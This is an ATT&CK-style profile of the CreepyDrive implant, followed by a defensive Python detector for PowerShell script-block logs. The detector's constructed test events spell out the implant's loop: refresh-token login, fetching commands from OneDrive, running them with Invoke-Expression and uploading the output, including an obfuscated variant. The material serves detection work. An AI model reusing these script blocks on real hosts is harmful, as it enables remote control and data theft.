CreepyDrive is a custom implant that has been used by POLONIUM since at least early 2022 for C2 with, and exfiltration to, actor-controlled OneDrive accounts.[1]

POLONIUM has used a similar implant called CreepyBox that relies on actor-controlled Dropbox accounts.[1]

ID: S1023
Platforms: Windows, Office 365
Version: 1.0
Created: 07 July 2022
Last Modified: 10 August 2022

Techniques Used

Domain ID Name Use
Enterprise T1071 .001 Application Layer Protocol: Web Protocols

CreepyDrive can use HTTPS for C2 via the Microsoft Graph API.[1]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

CreepyDrive can use PowerShell for execution, including the cmdlets Invoke-WebRequest and Invoke-Expression.[1]

Enterprise T1005 Data from Local System

CreepyDrive can upload files to C2 from victim machines.[1]

Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

CreepyDrive can use cloud services including OneDrive for data exfiltration.[1]

Enterprise T1083 File and Directory Discovery

CreepyDrive can specify the local file path to upload files from.[1]

Enterprise T1105 Ingress Tool Transfer

CreepyDrive can download files to the compromised host.[1]

Enterprise T1550 .001 Use Alternate Authentication Material: Application Access Token

CreepyDrive can use legitimate OAuth refresh tokens to authenticate with OneDrive.[1]

Enterprise T1102 .002 Web Service: Bidirectional Communication

CreepyDrive can use OneDrive for C2.[1]
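The entries above describe one observable loop: a stolen OAuth refresh token is exchanged for an access token, Invoke-WebRequest or Invoke-RestMethod fetches content from a OneDrive path through the Microsoft Graph API, that content is passed to Invoke-Expression, and results are PUT back to OneDrive. The following is an added detection example (not code from the ATT&CK entry, from the cited report, or from the implant) that scores PowerShell Script Block Logging events (Event ID 4104) for that combination and maps each indicator to the technique IDs listed here. It assumes the events have already been collected as dicts with EventID, ScriptBlockId and ScriptBlockText fields; every record in SAMPLE_EVENTS, including the malicious-looking script bodies, is constructed for this example. The cmdlet names, aliases, the Graph /me/drive/root:/...:/content paths and the grant_type=refresh_token token request are the public PowerShell and Microsoft identity platform interfaces, not details taken from CreepyDrive itself.

```python
"""
Detection sketch (added example): score PowerShell 4104 script blocks for the
CreepyDrive-style OneDrive/Graph C2 loop and map indicators to ATT&CK IDs.
All event records and script bodies below are constructed for this example.
"""
import re

# Only pattern matching is done on the text, never execution, so it is safe to
# strip every backtick (PowerShell's escape character, used to split names such
# as i`e`x) and to collapse string-concatenation joins ('graph.micro' + 'soft.com').
_CONCAT_JOIN = re.compile(r"""['"]\s*\+\s*['"]""")


def normalize(script_block: str) -> str:
    return _CONCAT_JOIN.sub("", script_block.replace("`", ""))


_WEB_CMDLET = re.compile(r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b", re.I)
_IEX = re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I)
_REFRESH_GRANT = re.compile(r"grant_type\W{1,4}refresh_token", re.I)   # OAuth refresh-token grant
_GRAPH_HTTPS = re.compile(r"https://graph\.microsoft\.com/", re.I)
_GRAPH_DRIVE = re.compile(r"""graph\.microsoft\.com/v1\.0/(?:[^\s"']*/)?drives?\b""", re.I)
_DRIVE_CONTENT = re.compile(r":/content\b", re.I)                      # DriveItem content endpoint
_UPLOAD_ARGS = re.compile(r"-Method\s+Put\b|-InFile\b", re.I)


def match_techniques(script_block: str) -> set[str]:
    """Return the ATT&CK technique IDs evidenced by one 4104 script block."""
    norm = normalize(script_block)
    hits: set[str] = set()
    if _REFRESH_GRANT.search(norm):
        hits.add("T1550.001")   # refresh token used directly instead of interactive sign-in
    if _GRAPH_HTTPS.search(norm):
        hits.add("T1071.001")   # HTTPS to the Graph API
    if _GRAPH_DRIVE.search(norm):
        hits.add("T1102.002")   # OneDrive (drive endpoints) as the channel
    if _WEB_CMDLET.search(norm) and _IEX.search(norm):
        hits.add("T1059.001")   # web cmdlet output reaches Invoke-Expression
    # Per-statement pass: a web cmdlet hitting a :/content URL is an upload when
    # it carries -Method Put or -InFile, otherwise a download. A URL held only in
    # a variable is not classified here (known limitation of this sketch).
    for stmt in re.split(r"[\r\n;]+", norm):
        if _WEB_CMDLET.search(stmt) and _GRAPH_DRIVE.search(stmt) and _DRIVE_CONTENT.search(stmt):
            if _UPLOAD_ARGS.search(stmt):
                hits.update({"T1567.002", "T1005"})   # local file pushed to OneDrive
            else:
                hits.add("T1105")                      # file/command pulled from OneDrive
    return hits


def is_creepydrive_like(script_block: str) -> bool:
    """Flag only when fetched content is executed AND the channel is OneDrive or a
    raw refresh-token grant; Graph traffic on its own is ordinary admin activity."""
    hits = match_techniques(script_block)
    return "T1059.001" in hits and bool(hits & {"T1550.001", "T1102.002"})


def triage(records):
    """records: iterable of 4104-shaped dicts; returns [(ScriptBlockId, sorted hits)] for flagged ones."""
    flagged = []
    for rec in records:
        if rec.get("EventID") != 4104:
            continue
        if is_creepydrive_like(rec["ScriptBlockText"]):
            flagged.append((rec["ScriptBlockId"], sorted(match_techniques(rec["ScriptBlockText"]))))
    return flagged


# Constructed sample events (hypothetical hosts, tokens and paths).
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockId": "sb-01",   # the full loop as the page describes it
     "ScriptBlockText": r'''
$body = "client_id=$cid&scope=Files.ReadWrite%20offline_access&grant_type=refresh_token&refresh_token=$rt"
$tok = (Invoke-RestMethod -Method Post -Uri "https://login.microsoftonline.com/common/oauth2/v2.0/token" -Body $body).access_token
$hdr = @{ Authorization = "Bearer $tok" }
$cmd = (Invoke-WebRequest -Headers $hdr -Uri "https://graph.microsoft.com/v1.0/me/drive/root:/cmd.txt:/content").Content
$out = Invoke-Expression $cmd | Out-String
Invoke-WebRequest -Method Put -Headers $hdr -Uri "https://graph.microsoft.com/v1.0/me/drive/root:/out.txt:/content" -Body $out
'''},
    {"EventID": 4104, "ScriptBlockId": "sb-02",   # routine installer download, no Graph, no IEX
     "ScriptBlockText": r'''Invoke-WebRequest -Uri "https://files.example.com/agent.msi" -OutFile C:\Temp\agent.msi; Start-Process msiexec.exe -ArgumentList "/i C:\Temp\agent.msi /quiet"'''},
    {"EventID": 4104, "ScriptBlockId": "sb-03",   # legitimate Graph download, nothing executed
     "ScriptBlockText": r'''$hdr = @{ Authorization = "Bearer $token" }
Invoke-RestMethod -Headers $hdr -Uri "https://graph.microsoft.com/v1.0/me/drive/root:/Reports/q2.xlsx:/content" -OutFile .\q2.xlsx'''},
    {"EventID": 4104, "ScriptBlockId": "sb-04",   # same loop with alias, backtick and string-split obfuscation
     "ScriptBlockText": r'''$u = 'https://graph.micro' + 'soft.com/v1.0/me/drive/root:/c.txt:/content'
$c = (iwr -Headers $hdr -Uri $u).Content
i`e`x $c
iwr -Method Put -Headers $hdr -Uri ('https://graph.microsoft.com/v1.0/me/drive/root:/r.txt:/' + 'content') -InFile C:\Users\Public\r.txt'''},
]

if __name__ == "__main__":
    for block_id, techniques in triage(SAMPLE_EVENTS):
        print(block_id, ", ".join(techniques))
```

Running it flags sb-01 and sb-04 and leaves the two benign blocks alone: sb-03 still earns T1071.001, T1102.002 and T1105 on its own, which is why the gate requires the Invoke-Expression link before anything is raised. The normalizer only undoes the two cheapest obfuscations; heavier encoding (for example -EncodedCommand or reflective loading) is better caught by logging the unwrapped script block, which 4104 already provides, and by pairing this with network telemetry for login.microsoftonline.com token requests and graph.microsoft.com drive traffic from hosts that have no business reason for either.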

Groups That Use This Software

ID Name References